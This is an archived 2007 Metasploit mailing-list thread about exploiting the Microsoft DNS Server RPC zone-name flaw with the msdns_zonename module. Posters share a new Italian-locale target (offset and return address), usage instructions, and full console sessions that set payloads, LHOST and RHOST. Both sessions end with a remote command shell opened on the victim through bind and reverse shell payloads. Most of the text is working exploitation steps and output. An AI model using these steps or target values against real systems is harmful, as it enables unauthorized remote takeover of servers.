Metasploit mailing list archives

Exploiting the Microsoft DNS RPC service

From: diaul at devilopers.org (diaul)
Date: Wed, 18 Apr 2007 11:05:05 +0200

Hi

U can simply add this target:

[ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' =>
0x74fd2ac4 } ],

btw some time ago I sent all windows italian opcodes to skape and now
they are available on metasploit opcodes db.

Here is msf3 session:

<CUT>

msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2003 Server SP0 English
   4   Windows 2003 Server SP1-SP2 English


msf exploit(msdns_zonename) > set TARGET 2
TARGET => 2
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(msdns_zonename) > set RHOST 10.4.14.47
RHOST => 10.4.14.47
msf exploit(msdns_zonename) > exploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1029
[*] Trying target Windows 2000 Server SP0-SP4+ Italian...
[*] Binding to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Bound to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444)

Microsoft Windows 2000 [Versione 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

</CUT>

Ciao :)

diaul


Giorgio Casali wrote:

Hi,
is it possible to have it for the Italian version?
Thanks

2007/4/16, H D Moore <hdm at metasploit.com <mailto:hdm at metasploit.com>>:

    The exploit module has been merged to stable, use 'Online Update' or
    'svn
    update' to grab it. The module's default target will exploit Windows
    2000
    SP0-SP4 and Windows 2003 SP0-SP2.

    All targets are designed for the English locale. If you have a
    non-English
    system, submit targets.

    The Windows 2003 SP0 target may not be reliable.

    The Windows 2003 SP1-SP2 targets will only work if hardware DEP is
    not in
    use. We use the SEH overwrite method for all targets and the /GS stack
    prevention means we will not be able to use standard hardware DEP bypass
    techniques (return to NTDLL to disable NX).

    The RPORT option defaults to '0' and will contact the endpoint mapper of
    the target system in order to determine the real RPC port at runtime.
    This saves a step, but it does mean that one of port 135 or 593 needs to
    be accessible on the target. If you are attacking a system with only
    ports > 1025 allowed through the firewall, you will need to locate the
    RPC service and set RPORT manually.

    To use the module, open the console interface, and run:
    msf> use exploit/windows/dcerpc/msdns_zonename
    msf exploit(msdns_zonename) >
    msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
    msf exploit(msdns_zonename) > set <payload options>
    msf exploit(msdns_zonename) > set RHOST <target>
    msf exploit(msdns_zonename) > exploit

    -- example --

    < metasploit >
    ------------
           \   ,__,
            \  (oo)____
               (__)    )\
                  ||--|| *


           =[ msf v3.0
    + -- --=[ 184 exploits - 104 payloads
    + -- --=[ 17 encoders - 5 nops
           =[ 33 aux

    msf > use exploit/windows/dcerpc/msdns_zonename
    msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(msdns_zonename) > set LHOST 192.168.0.127
    <http://192.168.0.127>
    LHOST => 192.168.0.127 <http://192.168.0.127>
    msf exploit(msdns_zonename) > set LPORT 4444
    LPORT => 4444
    msf exploit(msdns_zonename) > set RHOST 172.16.233.128
    <http://172.16.233.128>
    RHOST => 172.16.233.128 <http://172.16.233.128>

    msf exploit(msdns_zonename) > exploit
    [*] Started reverse handler
    [*] Connecting to the endpoint mapper service...
    [*] Discovered Microsoft DNS Server RPC service on port 1356
    [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
    [*] Binding to
    50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:
    172.16.233.128 <http://172.16.233.128>
    [0] ...
    [*] Bound to
    50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
    <http://172.16.233.128>
    [0] ...
    [*] Sending exploit...
    [*] Error: no response from dcerpc service
    [*] Command shell session 1 opened (192.168.0.127:4444
    <http://192.168.0.127:4444> ->
    192.168.0.127:45196 <http://192.168.0.127:45196>)

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: application/x-ruby
Size: 4763 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.rb>

Current thread:

Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
  - Exploiting the Microsoft DNS RPC service diaul (Apr 18)
    - Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
    - Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
    - Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)